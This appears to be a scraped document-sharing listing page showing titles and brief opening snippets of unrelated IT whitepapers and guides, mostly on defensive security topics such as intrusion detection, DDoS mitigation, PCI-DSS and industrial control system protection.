I D C T E C H N O L O G Y S P O T L I G H T Migrating to Windows 7? Technology Points to Consider September 2010 Adapted from Worldwide IT Asset Management Software 2009 2013 Forecast and 2008 Vendor Shares
More informationIncident Handling. Applied Risk Management. September 2002
Incident Handling Applied Risk Management September 2002 What is Incident Handling? Incident Handling is the management of Information Security Events What is an Information Security Event? An Information
More informationSAN Conceptual and Design Basics
TECHNICAL NOTE VMware Infrastructure 3 SAN Conceptual and Design Basics VMware ESX Server can be used in conjunction with a SAN (storage area network), a specialized high speed network that connects computer
More informationGFI White Paper PCI-DSS compliance and GFI Software products
White Paper PCI-DSS compliance and Software products The Payment Card Industry Data Standard () compliance is a set of specific security standards developed by the payment brands* to help promote the adoption
More informationOn-Premises DDoS Mitigation for the Enterprise
On-Premises DDoS Mitigation for the Enterprise FIRST LINE OF DEFENSE Pocket Guide The Challenge There is no doubt that cyber-attacks are growing in complexity and sophistication. As a result, a need has
More informationCisco Advanced Malware Protection for Endpoints
Data Sheet Cisco Advanced Malware Protection for Endpoints Product Overview With today s sophisticated malware, you have to protect endpoints before, during, and after attacks. Cisco Advanced Malware Protection
More informationALTIRIS Deployment Solution 6.8 PXE Overview
ALTIRIS Deployment Solution 6.8 PXE Overview Notice Altiris AAA Document 2006 Altiris, Inc. All rights reserved. Document Date: October 3, 2006 Altiris, Inc. is a pioneer of IT lifecycle management software
More informationIDS or IPS? Pocket E-Guide
Pocket E-Guide IDS or IPS? Differences and benefits of intrusion detection and prevention systems Deciding between intrusion detection systems (IDS) and intrusion prevention systems (IPS) is a particularly
More informationDVCrypt Conditional Access System
DVCrypt Conditional Access System Quick start guide 1. Introduction DVCrypt is a conditional access system for digital TV broadcasting networks (DVB). It consists of hardware modules and client/server
More informationInformation Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
More informationIntrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks
Intrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks Dale Peterson Director, Network Security Practice Digital Bond, Inc. 1580 Sawgrass Corporate Parkway, Suite 130 Sunrise, FL 33323
More informationCyber Threats Insights from history and current operations. Prepared by Cognitio May 5, 2015
Cyber Threats Insights from history and current operations Prepared by Cognitio May 5, 2015 About Cognitio Cognitio is a strategic consulting and engineering firm led by a team of former senior technology
More informationE-BUSINESS THREATS AND SOLUTIONS
E-BUSINESS THREATS AND SOLUTIONS E-BUSINESS THREATS AND SOLUTIONS E-business has forever revolutionized the way business is done. Retail has now a long way from the days of physical transactions that were
More informationNeelesh Kamkolkar, Product Manager. A Guide to Scaling Tableau Server for Self-Service Analytics
Neelesh Kamkolkar, Product Manager A Guide to Scaling Tableau Server for Self-Service Analytics 2 Many Tableau customers choose to deliver self-service analytics to their entire organization. They strategically
More informationSeven Strategies to Defend ICSs
INTRODUCTION Cyber intrusions into US Critical Infrastructure systems are happening with increased frequency. For many industrial control systems (ICSs), it s not a matter of if an intrusion will take
More informationFirst Look Trend Micro Deep Discovery Inspector
First Look Trend Micro Deep Discovery Inspector By looking for correlations in attack patterns, Trend Micro s Deep Discovery Inspector has the ability to protect networks against customised attacks and
More informationPractical Steps To Securing Process Control Networks
Practical Steps To Securing Process Control Networks Villanova University Seminar Rich Mahler Director, Commercial Cyber Solutions Lockheed Martin Lockheed Martin Corporation 2014. All Rights Reserved.
More informationExecutive Overview...4. Importance to Citizens, Businesses and Government...5. Emergency Management and Preparedness...6
Securing the State Of Michigan Information Technology Resources Table of Contents Executive Overview...4 Importance to Citizens, Businesses and Government...5 Emergency Management and Preparedness...6
More informationComparison of Firewall, Intrusion Prevention and Antivirus Technologies
White Paper Comparison of Firewall, Intrusion Prevention and Antivirus Technologies How each protects the network Juan Pablo Pereira Technical Marketing Manager Juniper Networks, Inc. 1194 North Mathilda
More informationNetwork Monitoring White Paper
Network ing White Paper ImageStream Internet Solutions, Inc. 7900 East 8th Road Plymouth, Indiana 46563 http://www.imagestream.com info@imagestream.com Phone: 574.935.8484 Sales: 800.813.5123 Fax: 574.935.8488
More informationCHAPTER 11: Flip Flops
CHAPTER 11: Flip Flops In this chapter, you will be building the part of the circuit that controls the command sequencing. The required circuit must operate the counter and the memory chip. When the teach
More informationFirst Line of Defense to Protect Critical Infrastructure
RFI SUBMISSION First Line of Defense to Protect Critical Infrastructure Developing a Framework to Improve Critical Infrastructure Cybersecurity Response to NIST Docket # 130208119-3119-01 Document # 2013-044B
More informationebus Player Quick Start Guide
ebus Player Quick Start Guide This guide provides you with the information you need to efficiently set up and start using the ebus Player software application to control your GigE Vision or USB3 Vision
More informationFighting Advanced Threats
Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.
More information